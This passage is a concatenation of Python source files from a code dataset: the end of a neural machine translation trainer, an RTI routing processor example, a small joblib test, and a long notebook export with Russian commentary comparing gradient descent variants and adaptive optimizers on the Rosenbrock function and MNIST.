tgtlng = torch.LongTensor(tgtlng).to(self.device)\r\n srclng = torch.LongTensor(srclng).to(self.device)\r\n sentlen = torch.LongTensor(sentlen).to(self.device)\r\n word_pairs = torch.LongTensor(word_pairs).to(self.device)\r\n word_pairs_y = torch.LongTensor(word_pairs_y).to(self.device)\r\n # print(src.size())\r\n self.optimizer.zero_grad()\r\n self.model.zero_grad()\r\n self.encoder.zero_grad()\r\n self.decoder.zero_grad()\r\n # print(src[:, 0])\r\n # print(tgt[:, 0])\r\n # print(tgt[:-1, 0])\r\n # print(tgt[1:, 0])\r\n output = self.model(src, tgt[:-1, :], tgtlng)\r\n\r\n # sentlen_out, wp_out = self.probe(src, srclng, word_pairs)\r\n # loss_syn1 = self.criterion2(sentlen_out, sentlen)\r\n # loss_syn2 = self.criterion2(wp_out, word_pairs_y)\r\n\r\n # loss_syn = loss_syn1 + loss_syn2\r\n\r\n output_ = output.view(-1, output.shape[-1])\r\n # print(output.size())\r\n # print(tgt.size())\r\n # print(tgt[1:, :].size())\r\n tgt_ = (tgt[1:, :]).contiguous().view(-1)\r\n\r\n loss = self.criterion(output_, tgt_)\r\n # loss /= (output.size(0)*output.size(1))\r\n\r\n loss_ppl = self.criterion_ppl(output_, tgt_)\r\n self.train_loss_ppl += loss_ppl.item()\r\n if self.args.mode == 'train':\r\n loss = loss + loss_syn\r\n\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.grad_clip)\r\n\r\n self.optimizer.step()\r\n self.train_loss += loss.item()\r\n\r\n # if self.args.mode == 'probe':\r\n # self.optimizer2.zero_grad()\r\n # loss_syn.backward()\r\n # self.optimizer2.step()\r\n\r\n # self.train_sentlen += loss_syn1.item()\r\n # self.train_wp += loss_syn2.item()\r\n\r\n pred_sents = []\r\n trg_sents = []\r\n output = output.transpose(0, 1)\r\n tgt = tgt.transpose(0, 1)\r\n\r\n for j in range(self.args.batch_size):\r\n pred_sent = self.get_sentence(output[j].data.cpu().numpy().argmax(axis=-1).tolist(), 'tgt')\r\n trg_sent = self.get_sentence(tgt[j, 1:].data.cpu().numpy().tolist(), 'tgt')\r\n pred_sents.append(pred_sent)\r\n trg_sents.append(trg_sent)\r\n bleu_value = get_bleu(pred_sents, trg_sents)\r\n self.train_bleu += bleu_value\r\n\r\n if i%self.args.log_interval == 0 and i>0:\r\n message = \"Train epoch: %d iter: %d train loss: %1.3f train_bleu: %1.3f , train_ppl: %4.3f, train_sentlen: %1.3f, train_wp: %1.3f, elapsed: %1.3f \" % (\r\n epoch, i, self.train_loss/self.args.log_interval, self.train_bleu/self.args.log_interval, np.exp(self.train_loss_ppl/self.args.log_interval), self.train_sentlen/self.args.log_interval, self.train_wp/self.args.log_interval,time.time() - start_time)\r\n print(message)\r\n self.train_loss = 0\r\n self.train_bleu = 0\r\n self.train_loss_ppl = 0\r\n self.train_sentlen = 0\r\n self.train_wp = 0\r\n start_time = time.time()\r\n\r\n val_bleu = self.evaluate()\r\n if val_bleu > self.best_bleu:\r\n self.best_bleu = val_bleu\r\n torch.save(self.model, 'models/model_' + self.args.mode + '.pb')\r\n patience = 0\r\n else:\r\n patience +=1\r\n # if patience > 3:\r\n # break\r\n\r\n def get_sentence(self, sentence, side):\r\n def _eos_parsing(sentence):\r\n # if '' in sentence:\r\n # return sentence[:sentence.index('')+1]\r\n # else:\r\n return sentence\r\n\r\n # index sentence to word sentence\r\n sentence = [self.dp.vocab.itos[s] for s in sentence]\r\n\r\n return _eos_parsing(sentence)\r\n\r\n\r\n def print_train_result(self, epoch, train_iter, start_time):\r\n mode = (\"================================= Train ====================================\")\r\n print (mode, '\\n')\r\n self.logger.write(mode+'\\n')\r\n self.sample.write(mode+'\\n')\r\n\r\n message = \"Train epoch: %d iter: %d train loss: %1.3f train bleu: %1.3f elapsed: %1.3f \" % (\r\n epoch, train_iter, self.train_loss.avg, self.train_bleu.avg, time.time() - start_time)\r\n print (message, '\\n\\n')\r\n self.logger.write(message+'\\n\\n')\r\n\r\n\r\n def print_valid_result(self, epoch, train_iter, val_bleu, start_time):\r\n mode = (\"================================= Validation ====================================\")\r\n print (mode, '\\n')\r\n self.logger.write(mode+'\\n')\r\n self.sample.write(mode+'\\n')\r\n\r\n message = \"Train epoch: %d iter: %d train loss: %1.3f train_bleu: %1.3f val bleu score: %1.3f elapsed: %1.3f \" % (\r\n epoch, train_iter, self.train_loss.avg, self.train_bleu.avg, val_bleu, time.time() - start_time)\r\n print (message, '\\n\\n' )\r\n self.logger.write(message+'\\n\\n')\r\n\r\n\r\n def print_sample(self, batch_size, epoch, train_iter, source, target, pred):\r\n\r\n def _write_and_print(message):\r\n for x in message:\r\n self.sample.write(x+'\\n')\r\n print ((\" \").join(message))\r\n\r\n random_idx = randomChoice(batch_size)\r\n src_sample = self.get_sentence(tensor2np(source)[random_idx], 'src')\r\n trg_sample = self.get_sentence(tensor2np(target)[random_idx], 'trg')\r\n pred_sample = self.get_sentence(tensor2np(pred[random_idx]).argmax(axis=-1), 'trg')\r\n\r\n src_message = [\"Source Sentence: \", (\" \").join(src_sample), '\\n']\r\n trg_message = [\"Target Sentence: \", (\" \").join(trg_sample), '\\n']\r\n pred_message = [\"Generated Sentence: \", (\" \").join(pred_sample), '\\n']\r\n\r\n message = \"Train epoch: %d iter: %d \" % (epoch, train_iter)\r\n self.sample.write(message+'\\n')\r\n _write_and_print(src_message)\r\n _write_and_print(trg_message)\r\n _write_and_print(pred_message)\r\n self.sample.write('\\n\\n\\n')\r\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":19653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624598580","text":"import os\nimport sys\nimport time\n\nsys.path.insert(0, os.path.abspath('..'))\n\nfrom rti.routing import proc\n\nclass ShapesProcessor(proc.Processor):\n def __init__(self, route, properties):\n pass\n\n def on_data_available(self, route):\n # Use squares as 'leading' input. For each Square instance, get the\n # equivalent instance from the Circle topic\n squares = route.inputs[\"Square\"].read()\n for shape in squares:\n if shape.valid_data:\n # read equivalent existing instance in the Circles Topic\n\n selector = dict(instance=shape.info['instance_handle'])\n circles = route.outputs['Circle'].read(selector)\n if len(circles) != 0 and circles[0].valid_data :\n shape.data['shapesize'] = circles[0].data['y']\n\n route['Triangle'].write(shape.data)\n else:\n # propagate dispose/unregister instance\n route['Triangle'].write(shape)\n # clear cache\n route['Square'].take(dict(instance=shape.info['instance_handle']))\n\n\n#3) In Connector we have for square in squares.valid_data_iter: so you don’t have to check if square.valid_data.","sub_path":"plugins/processors/pyprocessor/example/shapes_proc.py","file_name":"shapes_proc.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"202314350","text":"\nfrom multiprocessing import freeze_support,Pool\nimport time\n\nclass C1(object):\n def __init__(self,visitor):\n self.counter=0\n self.visitor=visitor\n\n def accept(self,i):\n self.visitor.visit(self)\n print(self.counter, \":C1计数\",id(self.visitor))\n\nclass Vistor(object):\n def __init__(self):\n self.counter=0\n def visit(self,ele):\n self.counter+=1\n #ele.counter+=1\n print('----exec done:',self.counter)\n\nif __name__ == '__main__':\n import tempfile\n import os\n import numpy as np\n from joblib import load, dump\n\n large_array = np.ones(int(1e6))\n temp_folder = tempfile.mkdtemp()\n filename = os.path.join(temp_folder, 'joblib_test.mmap')\n if os.path.exists(filename): os.unlink(filename)\n _ = dump(large_array, filename)\n large_memmap = load(filename, mmap_mode='r+')\n\n","sub_path":"tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"625788745","text":"# coding: utf-8\n\n# # L1 - Градиентый спуск и линейные модели\n\n# In[1]:\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.optimize import minimize\nimport math\n\nget_ipython().magic('matplotlib notebook')\nmatplotlib.rcParams['figure.figsize'] = '12,8'\nmatplotlib.rcParams['figure.max_open_warning'] = False\n\n\n# In[2]:\n\ndef setup_plot_figure(xlabel='x', ylabel='y', hline=False, vline=False, equal_axes=False):\n f = plt.figure()\n if equal_axes:\n plt.axis('equal')\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.grid(True, which='both')\n if hline:\n plt.axhline(color='k', alpha=0.7)\n if vline:\n plt.axvline(color='k', alpha=0.7)\n return f\n\n\n# In[5]:\n\nSAMPLE_NUM = 10000\n\npositive_class_features = np.random.normal(-1, 1, (SAMPLE_NUM, 2))\nnegative_class_features = np.random.normal(1.7, 1, (SAMPLE_NUM, 2))\n\nX = np.c_[np.ones(SAMPLE_NUM * 2), np.concatenate((positive_class_features, negative_class_features))]\nY = np.r_[np.ones(SAMPLE_NUM), -np.ones(SAMPLE_NUM)].reshape(SAMPLE_NUM * 2)\n\nw_exact = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(Y)\n\nx_ax = np.linspace(-5, 5, 2)\ny_ax_exact = np.array(-(w_exact[0] + w_exact[1] * x_ax) / w_exact[2])\n\nsetup_plot_figure(hline=True, vline=True, equal_axes=True)\nplt.scatter(positive_class_features[:, 0], positive_class_features[:, 1], c='green', alpha=0.2)\nplt.scatter(negative_class_features[:, 0], negative_class_features[:, 1], c='red', alpha=0.2)\nplt.plot(x_ax, y_ax_exact, color='b')\nplt.show()\n\n# Две матрицы размеров $a\\times b$ и $b \\times c$ перемножаются за $O(abc)$ операций ($a\\cdot c$ ячеек в новой таблице, на получение каждой требуется $b$ операций), матрица $a \\times a$ оборачивается за $O(a^3)$ операций, $a \\times b$ транспонируется за $O(ab)$. Зная это, а также считая, что входная выборка имеет размер $n$ и $m$ параметров, получаем следующую асимптотику за счёт выполнения последовательно пяти операций: транспонирования матрицы $X$ умножения матриц $X_{m\\times n}^T$ и $X_{n\\times m}$, обращения получившейся матрицы $m\\times m$, умножения обращённой матрицы $m\\times m$ и $X_{m\\times n}^T$ и умножения матриц $m\\times n$ и $Y_{n \\times 1}$. Тогда\n# $$O(m\\cdot n)+O(m\\cdot n \\cdot m)+O(m^3)+O(m\\cdot m \\cdot n)+O(m\\cdot n)=O(m^2n)+O(m^3).$$ Если считать, что $m$f(x, y) = (1-x)^2 + 100(y-x^2)^2$.\n\n# In[11]:\n\ndef rosenbrock(x):\n return (1 - x[0]) ** 2 + 100 * (x[1] - x[0] ** 2) ** 2\n\n\ndef rosenbrock_grad(x):\n return np.array([-2 * (1 - x[0]) - 400 * x[0] * (-x[0] ** 2 + x[1]), 200 * (-x[0] ** 2 + x[1])])\n\n\nxx = np.arange(-20, 20, 0.1)\nyy = np.arange(-20, 20, 0.1)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = rosenbrock((xgrid, ygrid))\nfig = setup_plot_figure()\nax = fig.gca(projection='3d')\ncont = ax.plot_surface(xgrid, ygrid, zgrid, norm=matplotlib.colors.LogNorm(), cmap=plt.cm.jet, linewidth=0, shade=False)\nfig.colorbar(cont, shrink=0.5, aspect=5)\nstart_ros = np.random.randn(2) * 20\nres_rosenbrock = grad_descent(start_ros, rosenbrock, rosenbrock_grad, 1e-5, 5000)[2]\nz_ros = rosenbrock(res_rosenbrock.T)\nax.plot(xs=res_rosenbrock.T[0], ys=res_rosenbrock.T[1], zs=z_ros)\nfig.show()\n\n\n# 1. См. ячейку выше.\n# 2. Можно заметить, что функция имеет участок с почти нулевым градиентом — «долину», но вне этой долины эта функция очень быстро растёт, поэтому при малых фиксированных $\\lambda$ функция будет очень медленно сходиться, а при больших — расходиться, при этом градиент будет вновь быстро расти. Также в окрестности глобального минимума («долине») алгоритм будет двигаться в сторону глобального минимума очень медленно из-за близкого к нулю градиента.\n# \n# 3. Можно изменять скорость обучения динамически одним из множества способов, например, описанных ниже. Можно также стартовать алгоритм достаточно большое раз со случайными параметрами и затем выбрать лучший. Ещё есть вариант с нормализацией градиента (вообще говоря, длину также можно задавать), чтобы на каждой итерации мы двигались в направлении уменьшения функции, но одинаковыми шагами.\n\n# In[7]:\n\ndef mse_loss(w, x, y):\n return (1 / x.shape[0]) * np.sum((x.dot(w) - y) ** 2)\n\n\ndef mse_grad(w, x, y):\n return (2 / x.shape[0]) * x.T.dot(x.dot(w) - y)\n\n\n# In[8]:\n\nstart_2d = np.random.randn(3) * 10\nsol_mse = grad_descent(start_2d, lambda w: mse_loss(w, X, Y), lambda w: mse_grad(w, X, Y), 0.01, 300)\nyy = np.array(-(sol_mse[0][0] + sol_mse[0][1] * x_ax) / sol_mse[0][2])\nsetup_plot_figure(hline=True, vline=True, equal_axes=True)\nplt.scatter(positive_class_features.T[0], positive_class_features.T[1], c='green', alpha=0.2)\nplt.scatter(negative_class_features.T[0], negative_class_features.T[1], c='red', alpha=0.2)\nplt.plot(x_ax, yy.T, color='b', label='Gradient descent')\nplt.plot(x_ax, y_ax_exact.T, color='black', label='Exact solution')\nplt.legend()\nplt.show()\nprint('Difference between solutions norm:', np.linalg.norm(sol_mse[0] - w_exact))\n\n\n# **Метод наискорейшего спуска**\n\n# In[15]:\n\ndef grad_descent_accel(x0, func, grad, iter_num):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n for i in range(iter_num):\n q = func(x0)\n costs[i] = q\n steps[i] = x0\n g = grad(x0)\n learn_rate = minimize(lambda l: func(x0 - l * g), x0=np.zeros((1,))).x\n x0 -= learn_rate * g\n return x0, costs, steps\n\n\n# In[16]:\n\nsol_mse_accel = grad_descent_accel(start_2d, lambda w: mse_loss(w, X, Y), lambda w: mse_grad(w, X, Y), 300)\nsetup_plot_figure('Number of iterations', 'Loss')\nplt.plot(sol_mse[1], color='black', label='Simple descent')\nplt.plot(sol_mse_accel[1], color='green', label='Accelerated descent')\nplt.legend()\nplt.show()\n\n\n# Из данного графика мы видим, что наискорейший спуск сходится значительно быстрее.\n\n# Если у нас есть какие-то признаки, которые встречаются достаточно редко, то соответствующий столбец будет разреженным.\n# \n# **Задание**\n# В чем заключается проблема?\n# \n# Так как в данном столбце будут преобладать нули, то градиент по соответствующей переменной на фоне остальных будет довольно мал, что означает в случае малой скорости обучения потенциально очень низкую скорость схождения ответа к оптимальному по данной переменной, а в случае большой - шанс расхождения по неразреженным столбцам. Более того, данные признаки могут быть значимыми при классификации, но из-за разреженности столбцов учитываться будут мало.\n\n# **Стохастический градиентный спуск**\n\n# In[17]:\n\ndef logistic_loss(w, x, y):\n return (1 / x.shape[0]) * sum(np.logaddexp(0, -y[i] * np.dot(x[i], w)) for i in range(x.shape[0]))\n\n\ndef logistic_grad(w, x, y):\n v = np.empty((x.shape[0], x.shape[1]))\n for i in range(x.shape[0]):\n val = -y[i] * np.dot(x[i], w)\n if np.abs(val) > 1000: # overflow protection\n if val > 0:\n v[i] = -y[i] * x[i]\n else:\n v[i] = 0\n else:\n v[i] = -y[i] * x[i] * (math.exp(val) / (1 + math.exp(val)))\n return (1 / x.shape[0]) * np.sum(v, axis=0)\n\n\n# In[18]:\n\ndef sgd(x0, x, y, func, grad, learn_rate, pass_num, batch_size=1):\n batch_num = x.shape[0] // batch_size\n costs = np.empty(pass_num * batch_num)\n steps = np.empty((pass_num * batch_num, x0.shape[0]))\n for p in range(pass_num):\n for j in range(batch_num):\n x_new = x[j * batch_size:(j + 1) * batch_size]\n y_new = y[j * batch_size:(j + 1) * batch_size]\n costs[p * batch_num + j] = func(x0, x_new, y_new)\n steps[p * batch_num + j] = x0\n x0 -= learn_rate * grad(x0, x_new, y_new)\n return x0, costs, steps\n\n\n# In[19]:\n\ntrain = np.loadtxt('train.csv', skiprows=1, delimiter=',')\nones = train[train[:, 0] == 1]\nzeroes = train[train[:, 0] == 0]\no_tr, o_test = np.split(ones, 2) # training set is equal in size to test set\nz_tr, z_test = np.split(zeroes, 2)\nz_tr[:, 0] = 1 # we need first feature column to contain 1 in order for prediction to be fully vectorized;\n# since b_size contains labels (0) in the original dataset, we can easily overwrite b_size after\n# extracting labels\ntrainset = np.concatenate((o_tr, z_tr))\ntestset = np.concatenate((o_test, z_test))\nlabels = np.r_[np.ones(o_tr.shape[0]), -np.ones(z_tr.shape[0])].reshape(o_tr.shape[0] + z_tr.shape[0], 1)\ntestset_labels = list(map(lambda x: 1 if x == 1 else -1, testset[:, 0])) # manually construct labels: 1 for 1, -1 for 0\ntestset[:, 0] = 1\n\n# In[20]:\n\nstart = np.zeros((train.shape[1]))\nsol = sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 10, 4000)\n\n\n# In[21]:\n\ndef calculate_acc(w, test_features, test_labels):\n # 1st return value is number of wrong predictions, 2nd is accuracy (correct guesses/number of items in test set\n wrong = sum(np.sign(test_features[i].dot(w)) != test_labels[i] for i in range(test_features.shape[0]))\n return wrong, 1 - wrong / testset.shape[0]\n\n\n# In[22]:\n\ncalculate_acc(sol[0], testset, testset_labels)\n\n# In[23]:\n\nsetup_plot_figure('Batch size', 'Accuracy')\nfor b_size in range(10, trainset.shape[0], 25):\n plt.plot(b_size,\n calculate_acc(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 1, b_size)[0], testset,\n testset_labels)[1], 'bo')\nplt.show()\n\n# Заметим, что размер батчей не влияет на качество классификации заметным образом за исключением случая, когда выборка делится на два батча только с нулями и единицами (размер каждого - примерно 2000)\n\n# In[24]:\n\nsetup_plot_figure('Batch size', 'Loss')\nplt.plot(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 400, 400)[1], color='green', label='400')\nplt.plot(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 10, 10)[1], color='red', label='10')\nplt.plot(sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 1)[1], color='blue', label='1')\nplt.legend(title='Batch elements')\nplt.show()\n\n\n# Такое число проходов для каждого размера батча мы ставим, чтобы в каждом случае алгоритм проработал одно и то же число итераций.\n# Можно заметить, что после ~4000 итерации графики функций (даже стохастического спуска) относительно стабилизируются, что может значить, что более 1 прохода даже в худшем случае по выборке делать смысла не так много.\n\n# **Экспоненциальное сглаживание**\n\n# In[25]:\n\ndef sgd_smooth(x0, x, y, func, grad, learn_rate, pass_num, batch_size=1, gamma=0):\n batch_num = x.shape[0] // batch_size\n costs = np.empty(pass_num * batch_num)\n steps = np.empty((pass_num * batch_num, x0.shape[0]))\n for p in range(pass_num):\n for j in range(batch_num):\n x_new = x[j * batch_size:(j + 1) * batch_size]\n y_new = y[j * batch_size:(j + 1) * batch_size]\n if p != 0 or j != 0:\n costs[p * batch_num + j] = gamma * costs[p * batch_num + j - 1] + (1 - gamma) * func(x0, x_new, y_new)\n else:\n costs[p * batch_num + j] = func(x0, x_new, y_new)\n steps[p * batch_num + j, :] = x0\n x0 -= learn_rate * grad(x0, x_new, y_new)\n return x0, costs, steps\n\n\n# In[26]:\n\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100, 1)[1], color='green',\n alpha=0.5)\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100, 0.75)[1], color='red',\n alpha=0.5)\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100, 0.25)[1], color='black',\n alpha=0.5)\nplt.plot(sgd_smooth(start, trainset, labels, logistic_loss, logistic_grad, 1e-7, 100, 100)[1], color='blue', alpha=0.5)\nplt.show()\n\n\n# Заметим, что в случае $\\gamma=1$ функция ошибки вырождается в константное значение на первом батче первого прохода, в случае $\\gamma=0$ - в функцию ошибки без сглаживания. Также можно рассмотреть конкретные $Q^k$ и $Q(x_{k+1})$, тогда после несложных преобразований получаем, что $Q^{k+1}$ - линейная функция от $\\gamma$, пересекающая ось ординат в точке $Q(x_{k+1})$. Таким образом, $\\gamma$ влияет на график функции ошибки следующим образом: последующие значение начинают \"учитывать\" предыдущие, таким образом, как и следует из названия, сглаживаются скачки функции ошибки при обработке стоящих друг за другом батчей. Наиболее подходящий способ вычисления $Q$ зависит от задачи: сглаживание может не всегда удовлетворять нашим нуждам (например, мы хотим с какой-то целью анализировать скачки в неизменном виде). \n\n# **Сохранение импульса**\n\n# In[27]:\n\ndef grad_descent_momentum(x0, func, grad, learn_rate, iter_num, gamma=0):\n steps = np.empty((iter_num, x0.shape[0]))\n costs = np.empty(iter_num)\n momentum = np.zeros(x0.shape[0])\n for i in range(iter_num):\n costs[i] = func(x0)\n momentum = gamma * momentum + learn_rate * grad(x0)\n x0 -= momentum\n steps[i] = x0\n return x0, costs, steps\n\n\n# In[28]:\n\ndef simple1_func(x): # z=10x^2+y^2\n return 10 * x[0] ** 2 + x[1] ** 2\n\n\ndef simple1_grad(x):\n return np.array([20 * x[0], 2 * x[1]])\n\n\nxx = np.arange(-10, 10, 0.01)\nyy = np.arange(-10, 10, 0.01)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = simple1_func((xgrid, ygrid))\nsetup_plot_figure()\ncont = plt.contour(xgrid, ygrid, zgrid)\ncont.clabel(fmt=\"%.0f\")\n\nstart_simple_1 = np.random.randn(2) * 10\nres_without_momentum = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50)\nplt.plot(res_without_momentum[2].T[0], res_without_momentum[2].T[1], 'bo', label='$\\gamma=0$ (regular GD)')\nres_with_momentum1 = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50, 0.25)\nplt.plot(res_with_momentum1[2].T[0], res_with_momentum1[2].T[1], 'ro', label='$\\gamma=0.25$')\nres_with_momentum2 = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50, 0.5)\nplt.plot(res_with_momentum2[2].T[0], res_with_momentum2[2].T[1], 'yo', label='$\\gamma=0.5$')\nres_with_momentum3 = grad_descent_momentum(start_simple_1, simple1_func, simple1_grad, 1e-2, 50, 0.75)\nplt.plot(res_with_momentum3[2].T[0], res_with_momentum3[2].T[1], 'go', label='$\\gamma=0.75$')\nplt.legend()\nplt.show()\n\n# In[29]:\n\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(res_without_momentum[1], label='$\\gamma=0$ (regular GD)')\nplt.plot(res_with_momentum1[1], label='$\\gamma=0.25$')\nplt.plot(res_with_momentum2[1], label='$\\gamma=0.5$')\nplt.plot(res_with_momentum3[1], label='$\\gamma=0.75$')\nplt.ylim(0, 10)\nplt.legend()\nplt.show()\n\n\n# Легко заметить, что повышение коэффициента на текущих данных и при фиксированных остальных параметрах даёт повышение скорости сходимости. Были рассмотрены 4 варианта $\\gamma$, отстоящие от соседей на равных расстояниях, чтобы продемонстрировать динамику изменений графика в зависимости от данного параметра.\n\n# **Ускоренный градиент Нестерова**\n\n# In[30]:\n\ndef grad_descent_nesterov(x0, func, grad, learn_rate, iter_num, gamma=0):\n steps = np.empty((iter_num, x0.shape[0]))\n costs = np.empty(iter_num)\n momentum = np.zeros(x0.shape[0])\n for i in range(iter_num):\n costs[i] = func(x0)\n momentum = gamma * momentum + learn_rate * grad(x0 - momentum)\n x0 -= momentum\n steps[i] = x0\n return x0, costs, steps\n\n\n# In[31]:\n\nstart_m = np.random.randn(2) * 10\nres_imp = grad_descent_momentum(start_m, rosenbrock, rosenbrock_grad, 1e-5, 100, 0.8)\nres_nes = grad_descent_nesterov(start_m, rosenbrock, rosenbrock_grad, 1e-5, 100, 0.8)\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(res_imp[1], label='Momentum')\nplt.plot(res_nes[1], label='Nesterov\\'s accelerated gradient')\nplt.title('Performance of two gradient descent improvements on Rosenbrock function')\nplt.legend()\nplt.show()\n\n# In[32]:\n\nxx = np.arange(-20, 20, 0.1)\nyy = np.arange(-20, 20, 0.1)\nxgrid, ygrid = np.meshgrid(xx, yy)\nzgrid = rosenbrock((xgrid, ygrid))\nfig = setup_plot_figure()\nax = fig.gca(projection='3d')\ncont = ax.plot_surface(xgrid, ygrid, zgrid, norm=matplotlib.colors.LogNorm(), cmap=plt.cm.jet, linewidth=0, shade=False)\nfig.colorbar(cont, shrink=0.5, aspect=5)\nax.plot(xs=res_imp[2].T[0], ys=res_imp[2].T[1], zs=rosenbrock(res_imp[2].T), label='Momentum')\nax.plot(xs=res_nes[2].T[0], ys=res_nes[2].T[1], zs=rosenbrock(res_nes[2].T), label='Nesterov\\'s accelerated gradient')\nplt.legend()\nfig.show()\n\n\n# **Adagrad (2011)**\n\n# In[33]:\n\ndef adagrad(x0, func, grad, learn_rate, iter_num):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n g = np.zeros((x0.shape[0], x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g += np.dot(gr.T, gr)\n x0 -= learn_rate * gr / (np.sqrt(np.diag(g)) + eps)\n return x0, costs, steps\n\n\n# In[34]:\n\nsol_sgd = sgd(start, trainset, labels, logistic_loss, logistic_grad, 1e-6, 1, 10)\nsol_adagrad = adagrad(start, lambda w: logistic_loss(w, trainset, labels), lambda w: logistic_grad(w, trainset, labels),\n 1e-6, 440)\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(sol_sgd[1], label='SGD')\nplt.plot(sol_adagrad[1], label='Adagrad')\nplt.legend()\nplt.title('Convergence on MNIST dataset for logistic loss function')\nplt.show()\n\n\n# **RMSprop**\n\n# In[35]:\n\ndef rmsprop(x0, func, grad, learn_rate, iter_num, gamma=1):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n g = np.zeros((x0.shape[0], x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g = gamma * g + (1 - gamma) * np.dot(gr.T, gr)\n x0 -= learn_rate * gr / (np.sqrt(np.diag(g)) + eps)\n return x0, costs, steps\n\n\n# **Adadelta (2012)**\n# 1. В [статье](https://arxiv.org/pdf/1212.5701v1.pdf) главным преимуществом данного метода над обычным Adagrad называется целиком адаптивная скорость обучения (не нужно подбирать стартовый параметр) и избавление от проблемы уменьшения шага градиента при большом числе итераций (в матрице $G$ значения монотонно возрастают, так как добавляются квадраты компонент градиентов). Теперь дробь, определяющяя коэффициент перед градиентом для каждого шага, определяется следующим образом: $$\\frac{RMS[\\Delta w]_{t-1}}{RMS[g]_t}$$ $RMS[a]=\\sqrt{E[a^2]+\\varepsilon}$, $E[a^2]_t=\\gamma E[a^2]_{t-1}+(1-\\gamma)a_t^2$. Таким образом, мы подсчитываем на каждой итерации \"средние квадратические\" для градиентов и шагов, а затем на основании полученных результатов вычисляем новый шаг.\n# 2. Выражение в знаменателе аналогично RMSprop, таким образом, всё, сказанное для него, остаётся истинным. Выражение в числителе добавляется для соответствия гипотетических \"единиц измерения\" $w$ и $\\Delta w$ (по аналогии с методом Ньютона рассматриваем диагональ гессиана, чтобы размерности в итоговом выражении сошлись).\n\n# In[36]:\n\ndef adadelta(x0, func, grad, iter_num, gamma=1):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n dx = np.zeros((x0.shape[0], x0.shape[0]))\n g = np.zeros((x0.shape[0], x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g = gamma * g + (1 - gamma) * np.dot(gr.T, gr)\n update = (np.sqrt(np.diag(dx)) + eps) * gr / (np.sqrt(np.diag(g)) + eps)\n dx = gamma * dx + (1 - gamma) * np.dot(update.T, update)\n x0 -= update\n return x0, costs, steps\n\n\n# **Adam (2015)**\n\n# In[37]:\n\ndef adam(x0, func, grad, learn_rate, iter_num, gamma=1):\n costs = np.empty(iter_num)\n steps = np.empty((iter_num, x0.shape[0]))\n eps = 0.01\n g = np.zeros((x0.shape[0], x0.shape[0]))\n momentum = np.zeros((x0.shape[0]))\n for i in range(iter_num):\n costs[i] = func(x0)\n steps[i] = x0\n gr = grad(x0)\n g = gamma * g + (1 - gamma) * np.dot(gr.T, gr)\n momentum = gamma * momentum + learn_rate * gr / (np.sqrt(np.diag(g)) + eps)\n x0 -= momentum\n return x0, costs, steps\n\n\n# In[38]:\n\nsol_rmsprop = rmsprop(start, lambda w: logistic_loss(w, trainset, labels), lambda w: logistic_grad(w, trainset, labels),\n 1e-6, 440, 0.5)\nsol_adadelta = adadelta(start, lambda w: logistic_loss(w, trainset, labels),\n lambda w: logistic_grad(w, trainset, labels), 440, 0.5)\nsol_adam = adam(start, lambda w: logistic_loss(w, trainset, labels), lambda w: logistic_grad(w, trainset, labels), 1e-6,\n 440, 0.5)\n\nsetup_plot_figure('Iteration', 'Loss')\nplt.plot(sol_adagrad[1], label='Adagrad')\nplt.plot(sol_rmsprop[1], label='RMSprop')\nplt.plot(sol_adadelta[1], label='Adadelta')\nplt.plot(sol_adam[1], label='Adam')\nplt.legend()\nplt.title('Convergence on MNIST dataset for logistic loss function')\nplt.show()\n\n# Можно заметить, что скорость сходимости Adam по сравнению с методом сохранения импульса и RMSprop действительно повысилась, что можно обосновать тем, что алгоритм комбинирует в себе лучшее от двух неконфликтующих оптимизаций.\n\n# **Задание**\n# 1. Предложите некоторую функцию, которая наглядно показывает отличие в работе всех предложенных методов.\n# 2. Сделайте анимацию, которая пошагово отрисовывает треки все спусков.\n\n# В качестве функции-бенчмарка можно рассмотреть уже знакомую функцию Розенброка, так как её свойства позволят нам легко сравнить сходимости (в частности, в \"долине\").\n\n# In[52]:\n\nbench_start = np.random.randn(2) * 10\nlr = 1e-7\niters = 50\nbench_basic = 